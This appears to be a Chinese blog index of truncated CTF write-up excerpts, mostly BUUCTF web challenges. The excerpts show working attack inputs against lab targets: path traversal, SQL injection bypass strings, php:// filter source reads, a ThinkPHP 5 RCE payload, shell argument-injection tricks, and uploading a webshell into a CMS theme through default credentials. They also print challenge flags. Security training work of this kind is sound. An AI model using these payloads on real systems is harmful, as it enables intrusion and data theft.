wuyaowangchuan的博客

说明这里就有flag有关的东西base32解密1nD3x.php <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red><B>This is a ver.

框框里面输入123可以看到url变成了这样http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=123试试http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=../../../../etc/passwd存在任意文件下载再猜猜这http://59193e2f-62ad-4629-88b4-86b773d82d4e.node.

直接给出了查询语句离谱简单试一下果然扫描目录继续访问只要密码对就给flag由于单引号被禁用，使用 \ 转义and前面的那个单引号，使得 ‘’ and passwd=’ 形成闭合构造passwd处为 ||/*1*/passwd/*2*/regexp/*3*/"^a";%00用regexp查询passwd ^匹配字符串开头 %00截断后面的内容但是不能在输入框直接提交，会被url encode 变为%2500被黑名单拦截即为 username=\&passwd=||/**

源代码里面有代码<?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):'.

<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } .

题目直接就给了源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { //$_SERVER['PHP_SELF']返回的是当前正在执行的脚本的名字'PHP_SELF'当前执行脚本的文件名，与 document root 有关。例如，在地址为 http://example.com/foo/bar..

<?php$MY = create_function("","die(`cat flag.php`);");//创建一个$MY的匿名函数，函数的作用是输出flag//匿名函数其实是有真正的名字，为%00lambda_%d(%d格式化为当前进程的第n个匿名函数,n的范围0-999)$hash = (openssl_random_pseudo_bytes(32));//生成一个随机数eval("function SUCTF_$hash(){"."global \$MY;"."\$MY();.

查看网页源代码发现有这一段$(document).ready(function(){ $("#div1").load("check.php #p1"); $(".close").click(function(){ $("#myAlert").hide(); }); $("#button1").click(function(){ $("#myAlert").hide(); guess=$("input").v.

进入环境

进入环境知识点1:data伪协议写入文件2：php://php://filter用于读取源码php://input用于执行php代码伪协议利用解释：https://www.cnblogs.com/-chenxs/p/11571903.html<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_conte

https://buuoj.cn/challenges#[DDCTF%202019]homebrew%20event%20loop进入环境每隔页面浏览一下最上面就是说明我现在有多少个钻石，多少积分点击进GO-to e-shop，就可以使用一个积分买一个钻石买完了之后主页会显示积分花完的时候点击就可以重置了以前做过类似购买的题目我做到的都是逻辑漏洞，抓包改余额，抓包改价格这些接下来看看View source code这个页面进入是py的代码from flask import

进入环境随便输入一个东西想到的是SQL注入没有回显，应该是被过滤掉了直接用这个试试?search=1 order by 1发现可以正常回显注意到了这个?search=1 order by 3说明有2列一个为uniqueid另一个应该就是flag我想继续union查询的时候发现有东西被过滤掉了输入id判断登录，即可，尝试万能密码登录：1 || 1=1 limit 0,1SELECT * FROM users WHERE uniqueid=1 || 1=1 limit 0

进入环境扫后台目录发现/secret和一个index.php访问index.php点击paper之后下载文档这个文档双击打不开shell命令：xxd命令用xxd打开 xxd download.php但是在终端直接显示的话太多了，翻不到上面的所以我就把他重定向到txt文件里面查看第一行里面就说了这是一个pdf打开之后这个文档说的是SSRF，猜测这个题目可能用到SSRF回头看了一眼paper的url是/download.php?dl=ssrf接着再去访问secret.

进入环境看样子是文件上传扫描目录/www.tar.gz可以获得源码先来代码审计数据结构T NAMES utf8;SET FOREIGN_KEY_CHECKS = 0;DROP DATABASE IF EXISTS `xdctf`;CREATE DATABASE xdctf;USE xdctf;DROP TABLE IF EXISTS `file`;CREATE TABLE `file` ( `fid` int(10) unsigned NOT NULL AUTO_IN.

https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool进入环境<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}//获取客户端真实的IP地址if(!isset($_GET['host'])) { highlight_file(__FILE.

这道题没有过滤，超级简单文章目录手注sqlmap跑进入环境手注b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1'http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23id=1%27%20and%201=2%20%23说明是字符型注入然后开始注入?id=1%27.

还是任意文件读取漏洞进入坏境点入链接这边可以读取文件试一试article?name=/etc/passwd读不到flag找找WP/proc/sched_debug # 提供cpu上正在运行的进程信息，可以获得进程的pid号，可以配合后面需要pid的利用/proc/mounts # 挂载的文件系统列表/proc/net/arp # arp表，可以获得内网其他机器的地址/proc/net/route # 路由表信息/proc/net/tcp and /proc/net/udp .

二维码扫一下没有发现里面还有个东西分离分离出个zip打开需要密码提示是四个数字暴力破解Ziperello链接：https://pan.baidu.com/s/17TxQVXE8oZZA_dsyJglaqQ提取码：2333CTF{vjpw_wnoei}

依旧是任意文件读取漏洞进入环境查看页面源代码访问一下这个目录看到…/就想到目录穿越n1book{afr_2_solved}

任意文件读取漏洞发现了?p=hello，然后页面回显了hello world因为提示了是文件读取漏洞没有回显因为刚刚也是?p=hello没有后缀，猜测后台有自己加后缀php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flagPD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9base64解码n1book{afr_1_solv.

进入环境提示是git源码泄露用githackpython2 githack.py http://4a8ce25f-e5c0-4f28-aafd-aa0b73ab8a98.node3.buuoj.cn/.git/去自动生成的文件里面找打开就可以看到flag

进入页面使用dirsearch扫描发现了这个访问继续访问找到了flag1回到扫目录的地方访问index.php.swp这个备份文件

地址：https://buuoj.cn/challenges#[GKCTF2020]%E8%80%81%E5%85%AB%E5%B0%8F%E8%B6%85%E5%B8%82%E5%84%BF进入环境可以看出由ShopXO CMS搭建的这道题是基于已有的漏洞ShopXO 安全漏洞shopxo的默认后台就是admin.php，登入的默认账号密码是admin和shopxo进去后台打开应用中心的应用商店的主题先下载一个主题在这个位置添加一个木马然后再上传加个phpinfo（

<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..

[WUSTCTF2020]朴实无华知识点：intval函数php MD5 弱比较tac读取文件${IFS}空格绕过进入环境robots.txt里面有东西进去这个文件好家伙假的flag就在这个页面到处看看响应头里面又有东西访问朴实无华，我知道题目为啥叫朴实无华了接下来代码审计我电脑的编码好像有问题，中文是乱码不过问题不大我去复制别人的//level 1if (isset($_GET['num'])){ $num = $_GET['num'];

[BJDCTF 2nd]old-hack告诉了我们是THINKPHP5的漏洞搜这个版本的漏洞发现是thinkphp5.0.23的命令执行THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析直接用payload_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /_method=__construct&

[BUUCTF 2018]Online Tool代码审计@mkdir @意思是压制错误提示，使其无错误提示，代表执行mkdir时不会返回或弹出错误提示chdir：改变目录到当前目录remote_addr和x_forwarded_for用来获取服务器IPescapeshellarg()和escapeshellcmd() 这两个在一起用会有问题传入的参数是：172.17.0.2' -v -d a=1经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'，

方法一打开谷歌浏览器ctrl+f 搜索flag 发现有东西，然后ctrl+a （全选）ctrl+c（复制）flag{security_through_obscurity}方法二使用在线网站将pdf转换成doc，可以得到flaghttps://app.xunjiepdf.com/pdf2wordflag{security_through_obscurity}方法三用linux自带的工具pdftotext把PDF文件转为txt文件pdftotext的使用方法https://blog.c

give_you_flag是一个动图用PS打开时间轴上面看到了一个定位点p上去扫描二维码flag{e7d478cf6b915f50ab1277f78502a2c5}